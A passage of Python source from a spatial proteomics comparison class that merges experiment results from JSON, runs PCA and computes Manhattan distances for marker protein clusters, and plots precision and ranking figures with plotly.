elif data_type == "quantity: profiles/protein groups" and exp_name == list(json_dict.keys())[0]:
df_quantity_pr_pg_combined = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_combined["Experiment"] = exp_name
elif data_type == "quantity: profiles/protein groups" and exp_name != list(json_dict.keys())[0]:
df_quantity_pr_pg_toadd = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_toadd["Experiment"] = exp_name
df_quantity_pr_pg_combined = pd.concat([df_quantity_pr_pg_combined, df_quantity_pr_pg_toadd])
elif data_type == "Manhattan distances" and exp_name == list(json_dict.keys())[0]:
df_distances_combined = pd.read_json(json_dict[exp_name][data_type])
df_distances_combined = df_distances_combined.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_combined.columns:
df_distances_combined.set_index(["Sequence"], inplace=True, append=True)
df_distances_combined = df_distances_combined[["distance"]].unstack(["Map"])
df_distances_combined.rename(columns = {"distance":exp_name}, inplace=True)
elif data_type == "Manhattan distances" and exp_name != list(json_dict.keys())[0]:
df_distances_toadd = pd.read_json(json_dict[exp_name][data_type])
df_distances_toadd = df_distances_toadd.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_toadd.columns:
df_distances_toadd.set_index(["Sequence"], inplace=True, append=True)
df_distances_toadd = df_distances_toadd[["distance"]].unstack(["Map"])
df_distances_toadd.rename(columns = {"distance":exp_name}, inplace=True)
df_distances_combined = pd.concat([df_distances_combined, df_distances_toadd], axis=1)#, join="inner")
elif data_type == "Dynamic Range" and exp_name == list(json_dict.keys())[0]:
df_dynamicRange_combined = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_combined["Experiment"] = exp_name
elif data_type == "Dynamic Range" and exp_name != list(json_dict.keys())[0]:
df_dynamicRange_toadd = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_toadd["Experiment"] = exp_name
df_dynamicRange_combined = pd.concat([df_dynamicRange_combined, df_dynamicRange_toadd])
# if data_type == "Overview table" and exp_name == list(json_dict.keys())[0]:
# #convert into dataframe
# df_distanceOverview_combined = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_combined["Experiment"] = exp_name
# df_distanceOverview_combined = df_distanceOverview_combined.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
#
# elif data_type == "Overview table" and exp_name != list(json_dict.keys())[0]:
# df_distanceOverview_toadd = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_toadd["Experiment"] = exp_name
# df_distanceOverview_toadd = df_distanceOverview_toadd.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
# #dataframes will be concatenated, only proteins/Profiles that are in both df will be retained
# df_distanceOverview_combined = pd.concat([df_distanceOverview_combined, df_distanceOverview_toadd])
elif data_type == "Unique Proteins":
unique_proteins_total[exp_name] = json_dict[exp_name][data_type]
elif data_type == "Analysis parameters":
self.analysis_parameters_total[exp_name] = json_dict[exp_name][data_type]
#try:
# for paramters in json_dict[exp_name][data_type].keys():
# if paramters=="acquisition":
# acquisition_loaded.append(json_dict[exp_name][data_type][paramters])
# #elif parameters=="Non valid profiles":
#except:
# continue
#
df_01_combined = df_01_combined.droplevel("join", axis=0)
#filter for consistently quantified proteins (they have to be in all fractions and all maps)
#df_01_filtered_combined = df_01_mean_combined.dropna()
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
#reframe it to make it ready for PCA
df_01_filtered_combined = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
#df_01_filtered_combined = df_01_combined.stack(["Experiment"]).dropna(axis=1)
df_01_filtered_combined = df_01_filtered_combined.div(df_01_filtered_combined.sum(axis=1), axis=0)
#df_01_filtered_combined = df_01_combined.copy()
#df_01_filtered_combined.columns.names = ["Experiment", "Fraction", "Map"]
## Replace protein IDs by the unifying protein ID across experiments
#comparison_IDs = pd.Series([split_ids_uniprot(el) for el in df_01_filtered_combined.index.get_level_values("Protein IDs")],
# name="Protein IDs")
#df_01_filtered_combined.index = df_01_filtered_combined.index.droplevel("Protein IDs")
#df_01_filtered_combined.set_index(comparison_IDs, append=True, inplace=True)
##reframe it to make it ready for PCA | dropna: to make sure, that you do consider only fractions that are in all experiments
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01_filtered_combined.index.get_level_values("Experiment")+"_"+df_01_filtered_combined.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df_01_filtered_combined.set_index(index_ExpMap, append=True, inplace=True)
df_distances_combined.columns.names = ["Experiment", "Map"]
series = df_distances_combined.stack(["Experiment", "Map"])
series.name = "distance"
df_distance_comp = series.to_frame()
#fuse Experiment and Map into one column = "Exp_Map"
index_dist_ExpMap = df_distance_comp.index.get_level_values("Experiment")+"_"+df_distance_comp.index.get_level_values("Map")
index_dist_ExpMap.name = "Exp_Map"
df_distance_comp.set_index(index_dist_ExpMap, append=True, inplace=True)
#new
#self.df_distance_comp2 = df_distance_comp.copy()
df_distance_comp.reset_index(level=['Protein IDs'], inplace=True)
df_distance_comp["Protein IDs"] = df_distance_comp["Protein IDs"].str.split(";", expand=True)[0]
df_distance_comp = df_distance_comp.set_index("Protein IDs", append=True).unstack(["Experiment", "Exp_Map", "Map"]).dropna().stack(["Experiment", "Exp_Map", "Map"]).reset_index()
#df_distance_comp.reset_index(inplace=True)
self.unique_proteins_total = unique_proteins_total
self.exp_names = list(df_01_filtered_combined.index.get_level_values("Experiment").unique())
self.exp_map_names = list(index_dist_ExpMap.unique())
self.df_01_filtered_combined = df_01_filtered_combined
#self.df_01_mean_filtered_combined = df_01_mean_filtered_combined
self.df_quantity_pr_pg_combined = df_quantity_pr_pg_combined
self.df_dynamicRange_combined = df_dynamicRange_combined
self.df_distance_comp = df_distance_comp
try:
organism = json_dict[list(json_dict.keys())[0]]["Analysis parameters"]['organism']
except:
organism = "Homo sapiens - Uniprot"
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(organism)))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.clusters_for_ranking = self.markerproteins.keys()
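# Usage sketch (hypothetical; requires `import json` and an AnalysedDatasets.json produced by SpatialDataSet):
#   comp = SpatialDataSetComparison(ref_exp="Exp2")
#   with open("AnalysedDatasets.json") as f:   # path is an assumption
#       comp.json_dict = json.load(f)
#   comp.read_jsonFile()
#   comp.perform_pca_comparison()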
def perform_pca_comparison(self):
"""
PCA will be performed, using 0/1 normalized data averaged across maps for each experiment.
Args:
self:
df_01_filtered_combined: df, which contains 0/1 normalized data for each map - for all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Protein IDs", "Gene names", "Compartment", "Experiment", "Map", "Exp_Map"
df_01_mean_filtered_combined: df, which contains (global) 0/1 normalized data across all maps (mean) - for all experiments and for all protein IDs,
that are consistent throughout all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Gene names", "Protein IDs", "Compartment", "Experiment"
Returns:
self:
df_pca: PCA processed dataframe of experiment-averaged profiles
index: "Gene names", "Protein IDs", "Compartment", "Experiment" (and "Sequence" for peptide-level data)
columns: "PC1", "PC2", "PC3"
contains all proteins that are consistently quantified across the selected experiments
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
"""
markerproteins = self.markerproteins.copy()
#df_01_filtered_combined = self.df_01_filtered_combined
#df_01_filtered_combined = self.df_01_filtered_combined
df_mean = pd.DataFrame()
for exp in self.exp_names:
df_exp = self.df_01_filtered_combined.stack("Fraction").unstack(["Experiment", "Map","Exp_Map"])[exp].mean(axis=1).to_frame(name=exp)
df_mean = pd.concat([df_mean, df_exp], axis=1)
df_mean = df_mean.rename_axis("Experiment", axis="columns").stack("Experiment").unstack("Fraction")
pca = PCA(n_components=3)
df_pca = pd.DataFrame(pca.fit_transform(df_mean))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_mean.index
try:
markerproteins["PSMA subunits"] = [item for sublist in [re.findall("PSMA.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
markerproteins["PSMB subunits"] = [item for sublist in [re.findall("PSMB.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
del markerproteins["Proteasome"]
except:
pass
###only one df, make annotation at that time
df_cluster = pd.DataFrame([(k, i) for k, l in markerproteins.items() for i in l], columns=["Cluster", "Gene names"])
df_global_pca = df_pca.reset_index().merge(df_cluster, how="left", on="Gene names")
df_global_pca.Cluster.replace(np.NaN, "Undefined", inplace=True)
self.markerproteins_splitProteasome = markerproteins
self.df_pca = df_pca
self.df_global_pca = df_global_pca
def plot_pca_comparison(self, cluster_of_interest_comparison="Proteasome", multi_choice=["Exp1", "Exp2"]):
"""
A PCA plot for desired experiments (multi_choice) and 1 desired cluster is generated.
Either the maps for every single experiment are displayed individually or in a combined manner
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
multi_choice: list of experiment names
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
df_pca: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
Returns:
pca_figure: PCA plot for a specified protein cluster.
"""
df_pca = self.df_pca.copy()
markerproteins = self.markerproteins
try:
df_setofproteins_PCA = pd.DataFrame()
for map_or_exp in multi_choice:
for marker in markerproteins[cluster_of_interest_comparison]:
try:
plot_try_pca = df_pca.xs((marker, map_or_exp), level=["Gene names", "Experiment"], drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
df_setofproteins_PCA = df_setofproteins_PCA.assign(Experiment_lexicographic_sort=pd.Categorical(df_setofproteins_PCA["Experiment"], categories=multi_choice,
ordered=True))
df_setofproteins_PCA.sort_values("Experiment_lexicographic_sort", inplace=True)
pca_figure = px.scatter_3d(df_setofproteins_PCA,
x="PC1",
y="PC2",
z="PC3",
color="Experiment",
template="simple_white",
hover_data=["Gene names"]
)
pca_figure.update_layout(autosize=False,
width=700,
height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
template="simple_white"
)
return pca_figure
except:
return "This protein cluster was not identified in all experiments"
def plot_global_pca_comparison(self, cluster_of_interest_comparison="Proteasome", x_PCA="PC1", y_PCA="PC3",
markerset_or_cluster=False, multi_choice=["Exp1", "Exp2"]):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
multi_choice: list of experiment names
css_color: list of colors
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
Returns:
pca_figure: global PCA plot, clusters based on the markerset based (df_organellarMarkerSet) are color coded.
"""
df_global_pca_exp = self.df_global_pca.loc[self.df_global_pca["Experiment"].isin(multi_choice)]
df_global_pca_exp.reset_index(inplace=True)
compartments = list(SpatialDataSet.df_organellarMarkerSet["Compartment"].unique())
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
compartments.insert(0, "undefined")
compartments.insert(len(compartments), "Selection")
cluster = self.markerproteins_splitProteasome.keys()
cluster_color = dict(zip(cluster, self.css_color))
cluster_color["Undefined"] = "lightgrey"
if markerset_or_cluster == True:
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster!="Undefined"].sort_values(by="Cluster")
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster=="Undefined"].append(df_global_pca)
else:
for i in self.markerproteins[cluster_of_interest_comparison]:
df_global_pca_exp.loc[df_global_pca_exp["Gene names"] == i, "Compartment"] = "Selection"
df_global_pca = df_global_pca_exp.assign(Compartment_lexicographic_sort = pd.Categorical(df_global_pca_exp["Compartment"],
categories=[x for x in compartments],
ordered=True))
df_global_pca.sort_values(["Compartment_lexicographic_sort", "Experiment"], inplace=True)
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment" if markerset_or_cluster == False else "Cluster",
color_discrete_map=compartment_color if markerset_or_cluster == False else cluster_color,
title="Protein subcellular localization by PCA",
hover_data=["Protein IDs", "Gene names", "Compartment"],
facet_col="Experiment",
facet_col_wrap=2,
opacity=0.9,
template="simple_white"
)
fig_global_pca.update_layout(autosize=False,
width=1800 if markerset_or_cluster == False else 1600,
height=400*(int(len(multi_choice) / 2) + (len(multi_choice) % 2 > 0)),
template="simple_white"
)
return fig_global_pca
def get_marker_proteins(self, experiments, cluster):
df_in = self.df_01_filtered_combined.copy()
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster = df_cluster.append(df_p)
if len(df_cluster) == 0:
return df_cluster
# filter for all selected experiments
df_cluster = df_cluster.droplevel("Exp_Map", axis=0)
df_cluster = df_cluster.unstack(["Experiment", "Map"])
if any([el not in df_cluster.columns.get_level_values("Experiment") for el in experiments]):
return pd.DataFrame()
drop_experiments = [el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments]
if len(drop_experiments) > 0:
df_cluster.drop([el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments],
level="Experiment", axis=1, inplace=True)
df_cluster.dropna(inplace=True)
if len(df_cluster) == 0:
return df_cluster
df_cluster.set_index(pd.Index(np.repeat(cluster, len(df_cluster)), name="Cluster"), append=True, inplace=True)
return df_cluster
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
df_distances = pd.DataFrame()
# loop over experiments
experiments = set(df_cluster.columns.get_level_values("Experiment"))
for exp in experiments:
df_exp = df_cluster.xs(exp, level="Experiment", axis=1)
ref_profile = pd.DataFrame(df_exp.apply(complex_profile, axis=0, result_type="expand")).T
# loop over maps
maps = set(df_exp.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_exp.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[(exp, m)], index=df_exp.index)
df_distances = pd.concat([df_distances, d_m], axis=1)
df_distances.columns = pd.MultiIndex.from_tuples(df_distances.columns, names=["Experiment", "Map"])
return df_distances
def calc_biological_precision(self, experiments=None, clusters=None):
"""
Method to calculate the distance table for assessing biological precision
"""
df_distances = pd.DataFrame()
if experiments is None:
experiments = self.exp_names
if clusters is None:
clusters = self.markerproteins.keys()
for cluster in clusters:
df_cluster = self.get_marker_proteins(experiments, cluster)
if len(df_cluster) == 0:
continue
dists_cluster = self.calc_cluster_distances(df_cluster)
df_distances = df_distances.append(dists_cluster)
df_distances = df_distances.stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment","Gene names"]).rename({0: "distance"}, axis=1)
df_distances.insert(0, "Exp_Map", ["_".join([e,m]) for e,m in zip(df_distances["Experiment"], df_distances["Map"])])
self.df_distance_comp = df_distances
return df_distances
def get_complex_coverage(self, min_n=5):
full_coverage = {}
for complx in self.markerproteins.keys():
df = self.get_marker_proteins(self.exp_names, complx)
if len(df) >= min_n:
full_coverage[complx] = len(df)
partial_coverage = {}
for exp in self.exp_names:
for complx in self.markerproteins.keys():
if complx in full_coverage.keys():
continue
df = self.get_marker_proteins([exp], complx)
#print(df)
if complx in partial_coverage.keys():
partial_coverage[complx].append(len(df))
else:
partial_coverage[complx] = [len(df)]
no_coverage = {}
for k in partial_coverage.keys():
if all([el < min_n for el in partial_coverage[k]]):
no_coverage[k] = partial_coverage[k]
for k in no_coverage.keys():
del partial_coverage[k]
self.coverage_lists = [full_coverage, partial_coverage, no_coverage]
return full_coverage, partial_coverage, no_coverage
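# Usage sketch (hypothetical `comp` after read_jsonFile): split marker complexes by quantification coverage,
# i.e. clusters with >= min_n members across all experiments vs. only in individual experiments vs. none:
#   full, partial, none = comp.get_complex_coverage(min_n=5)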
def distance_boxplot_comparison(self, cluster_of_interest_comparison="Proteasome", collapse_maps=False, multi_choice=["Exp1", "Exp2"]):
"""
A box plot for desired experiments (multi_choice) and 1 desired cluster is generated displaying the distribution of the e.g.
Manhattan distance. Either the maps for every single experiment are displayed individually or in a combined manner.
Args:
self:
multi_choice: list of experiment names
collapse_maps: boolean
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
map_names: individual map names are stored as an index
df_distance_comp: df, no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map",
"Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
#an error message is already displayed if no experiments are selected, hence return an empty string
if len(multi_choice)>=1:
pass
else:
return ("")
df_distance_comp = self.df_distance_comp.copy()
#set categorical column, allowing lexicographic sorting
df_distance_comp["Experiment_lexicographic_sort"] = pd.Categorical(df_distance_comp["Experiment"], categories=multi_choice, ordered=True)
df_distance_comp.sort_values(["Experiment_lexicographic_sort", "Map"], inplace=True)
if collapse_maps == False:
#get only values from the experiments of interest
df_distance_selectedExp = df_distance_comp.loc[df_distance_comp["Experiment"].isin(multi_choice)]
#get only values from the cluster of interest
df_distance_selectedExp = df_distance_selectedExp.loc[df_distance_selectedExp["Cluster"]==cluster_of_interest_comparison]
if df_distance_selectedExp.shape[0] == 0:
self.cache_cluster_quantified = False
else:
individual_distance_boxplot_figure=go.Figure()
for i, exp in enumerate(multi_choice):
df_plot=df_distance_selectedExp[df_distance_selectedExp["Experiment"]==exp]
individual_distance_boxplot_figure.add_trace(go.Box(
x=[df_plot["Experiment"], df_plot["Map"]],
y=df_plot["distance"],
#line=dict(color=pio.templates["simple_white"].layout["colorway"][i]),
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
name=exp,
hovertext=df_plot["Gene names"]
))
individual_distance_boxplot_figure.update_layout(boxmode="group",
xaxis_tickangle=90,
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
autosize=False,
width=350*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Experiment",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Distance",
mirror=True),
template="simple_white")
return individual_distance_boxplot_figure
else:
map_or_exp_names = multi_choice
level_of_interest = "Experiment"
boxplot_color = "Experiment"
df_distance_selectedExp_global = df_distance_comp
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_selectedExp_global.set_index(["Gene names", level_of_interest, "Cluster"], inplace=True)
df_cluster_xmaps_distance_global = pd.DataFrame()
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_selectedExp_global" and appended to the new dataframe df_cluster_xmaps_distance_global
for map_or_exp in map_or_exp_names:
plot_try = df_distance_selectedExp_global.xs((cluster_of_interest_comparison, map_or_exp), level=["Cluster",
level_of_interest], drop_level=False)
df_cluster_xmaps_distance_global = df_cluster_xmaps_distance_global.append(plot_try)
df_cluster_xmaps_distance_global.sort_values("Experiment_lexicographic_sort", inplace=True)
df_cluster_xmaps_distance_global.reset_index(inplace=True)
distance_boxplot_figure = px.box(df_cluster_xmaps_distance_global,
x=level_of_interest,
y="distance",
points="all",
hover_name="Gene names",
color=boxplot_color,
template="simple_white",
title="Global Manhattan distance distribution for the protein cluster: {}".format(cluster_of_interest_comparison)
)
distance_boxplot_figure.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
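# Illustrative usage sketch (assumption: `comp` is an instance of this class and
# self.df_distance_comp has already been assembled): the per-map boxplot for one
# cluster across two experiments could be generated like this.
#
#     fig = comp.distance_boxplot_comparison(cluster_of_interest_comparison="Proteasome",
#                                            collapse_maps=False,
#                                            multi_choice=["Exp1", "Exp2"])
#     if fig is not None:
#         fig.show()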
def plot_biological_precision(self, multi_choice=None, clusters_for_ranking=None, min_members=5, reference=""):
if multi_choice is None:
multi_choice = self.exp_names
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
if len(multi_choice) == 0 or len(clusters_for_ranking) == 0:
return("Please provide at least one experiment and one cluster for ranking")
df = self.df_distance_comp.copy()
df = df[df["Experiment"].isin(multi_choice)]
df = df[df["Cluster"].isin(clusters_for_ranking)]
df_m = df.groupby(["Cluster", "Experiment", "Map"]).filter(lambda x: len(x)>=min_members)
df_c = df_m.groupby(["Cluster", "Experiment"]).median().reset_index()
df_m = df_m.groupby(["Cluster", "Experiment", "Map"]).median().reset_index()
df_m = df_m.assign(Experiment_lexicographic_sort = pd.Categorical(df_m["Experiment"], categories=multi_choice, ordered=True))
df_m = df_m.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
df_c = df_c.assign(Experiment_lexicographic_sort = pd.Categorical(df_c["Experiment"], categories=multi_choice, ordered=True))
df_c = df_c.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
bp_stacked_bar = px.bar(df_m, x="Experiment", y="distance", color="Cluster", hover_data=["Map"],
width=400+80*len(multi_choice), template="simple_white", height=100+30*len(clusters_for_ranking)).update_layout(legend_traceorder="reversed")
bp_box_minus_min = px.box(df_m.set_index(["Experiment", "Cluster", "Map"]).unstack(["Experiment", "Map"])\
.apply(lambda x: x-x.min(), axis=1).stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x]),
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster", "Map"],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance - cluster offset (minimum)")
bp_box_minus_ref = px.box(df_c.set_index(["Experiment", "Cluster"]).unstack(["Experiment"])\
.apply(lambda x: x/x[("distance", reference)], axis=1).stack(["Experiment"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x])\
.loc[lambda x: x.Experiment != reference],
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster"],
color_discrete_sequence=[px.colors.qualitative.D3[multi_choice.index(el)]
for el in multi_choice if el != reference],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance relative to {}".format(reference))
return bp_stacked_bar, bp_box_minus_min, bp_box_minus_ref
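# Illustrative usage sketch (instance name `comp` is hypothetical; `reference` must be one of the
# selected experiments, since cluster medians are divided by the reference experiment's medians):
#
#     bar, box_min, box_ref = comp.plot_biological_precision(multi_choice=["Exp1", "Exp2"],
#                                                            min_members=5, reference="Exp1")
#     bar.show()
#     box_min.show()
#     box_ref.show()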
def distance_ranking_barplot_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], clusters_for_ranking=None, ranking_boxPlot="Box plot"):#, toggle_sumORmedian=False):
#ref_exp="Exp1",
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
#an error message, if no Experiments are selected, will be displayed already, that is why: return ""
if len(multi_choice)>=1:
pass
else:
return ("")
#dict_cluster_normalizedMedian = {}
#multi_choice = i_multi_choice.value
#clusters_for_ranking = i_clusters_for_ranking.value
df_distance_comp = self.df_distance_comp.copy()
df_distance_comp = df_distance_comp[df_distance_comp["Experiment"].isin(multi_choice)]
df_distance_comp = df_distance_comp[df_distance_comp["Cluster"].isin(clusters_for_ranking)]
df_quantified_cluster = df_distance_comp.reset_index()
df_quantified_cluster = df_distance_comp.drop_duplicates(subset=["Cluster", "Experiment"]).set_index(["Cluster",
"Experiment"])["distance"].unstack("Cluster")
self.df_quantified_cluster = df_quantified_cluster.notnull().replace({True: "x", False: "-"})
dict_quantified_cluster = {}
dict_cluster_normalizedMedian_ref = {}
dict_median_distance_ranking = {}
for cluster in clusters_for_ranking:
try:
df_cluster = df_distance_comp[df_distance_comp["Cluster"]==cluster]
cluster_quantitity = df_cluster["Gene names"].unique().size
if cluster_quantitity>= 5:
dict_quantified_cluster[cluster] = cluster_quantitity
all_median_one_cluster_several_exp = {}
#ref = df_cluster["distance"].median()
for exp in multi_choice:
median = df_cluster[df_cluster["Experiment"]==exp]["distance"].median()
all_median_one_cluster_several_exp[exp] = float(median)
#new
#if exp == ref_exp:
# ref = median
ref = np.median(list(all_median_one_cluster_several_exp.values()))
dict_median_distance_ranking[cluster] = all_median_one_cluster_several_exp
median_ranking_ref = {exp: median/ref for exp, median in all_median_one_cluster_several_exp.items()}
dict_cluster_normalizedMedian_ref[cluster] = median_ranking_ref
else:
continue
except:
continue
self.cluster_above_treshold = dict_quantified_cluster.keys()
self.df_quantified_cluster2 = pd.DataFrame.from_dict({"Number of PG per Cluster":dict_quantified_cluster}).T
df_cluster_normalizedMedian_ref = pd.DataFrame(dict_cluster_normalizedMedian_ref)
df_cluster_normalizedMedian_ref.index.name="Experiment"
df_cluster_normalizedMedian_ref.rename_axis("Cluster", axis=1, inplace=True)
#median makes a huge difference, improves results of DIA, MQ, library
df_RelDistanceRanking = pd.concat([df_cluster_normalizedMedian_ref.median(axis=1), df_cluster_normalizedMedian_ref.sem(axis=1)], axis=1,
keys=["Distance Ranking (rel, median)", "SEM"]).reset_index().sort_values("Distance Ranking (rel, median)")
ranking_sum = df_cluster_normalizedMedian_ref.sum(axis=1).round(2)
ranking_sum.name = "Normalized Median - Sum"
df_ranking_sum = ranking_sum.reset_index()
#ranking_product = df_cluster_normalizedMedian.product(axis=1).round(2)
#ranking_product.name = "Normalized Median - Product"
#df_globalRanking = pd.concat([pd.DataFrame(ranking_sum), pd.DataFrame(ranking_product)], axis=1).reset_index()
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.stack("Cluster")
df_cluster_normalizedMedian_ref.name="Normalized Median"
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.reset_index()
self.df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.assign(Experiment_lexicographic_sort = pd.Categorical(df_cluster_normalizedMedian_ref["Experiment"], categories=multi_choice, ordered=True))
df_cluster_normalizedMedian_ref.sort_values("Experiment_lexicographic_sort", inplace=True)
if collapse_cluster == False:
fig_ranking = px.bar(df_cluster_normalizedMedian_ref,
x="Cluster",
y="Normalized Median",
color="Experiment",
barmode="group",
title="Ranking - normalization to reference experiments the median across all experiments for each cluster",
template="simple_white"
)
fig_ranking.update_xaxes(categoryorder="total ascending")
fig_ranking.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
return fig_ranking
else:
if ranking_boxPlot == "Bar plot - median":
fig_globalRanking = px.bar(df_RelDistanceRanking.sort_values("Distance Ranking (rel, median)"),
x="Experiment",
y="Distance Ranking (rel, median)",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# - median of all individual normalized medians - reference experiment is the median across all experiments for each cluster",
error_x="SEM", error_y="SEM",
color="Experiment",
template="simple_white")
if ranking_boxPlot == "Box plot":
fig_globalRanking = px.box(df_cluster_normalizedMedian_ref,
x="Experiment",
y="Normalized Median",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# "Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment",
points="all",
template="simple_white",
hover_name="Cluster")
#return pn.Column(pn.Row(fig_globalRanking), pn.Row(fig_globalRanking2))
else:
fig_globalRanking = px.bar(df_ranking_sum.sort_values("Normalized Median - Sum"),
x="Experiment",
template="simple_white",
y="Normalized Median - Sum",
title="Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment")
fig_globalRanking.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return fig_globalRanking
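# Illustrative usage sketch (instance name `comp` is hypothetical): either a per-cluster
# grouped bar chart (collapse_cluster=False) or a collapsed summary figure is returned.
#
#     fig = comp.distance_ranking_barplot_comparison(collapse_cluster=True,
#                                                    multi_choice=["Exp1", "Exp2"],
#                                                    ranking_boxPlot="Box plot")
#     fig.show()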
def quantity_pr_pg_barplot_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing number of protein groups/profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_quantity_pr_pg: barplot, number of protein groups/profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)]
df_quantity_pr_pg_combined.insert(0,"Expxfiltering",[" ".join([e,f]) for e,f in zip(
df_quantity_pr_pg_combined.Experiment, df_quantity_pr_pg_combined.filtering)])
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
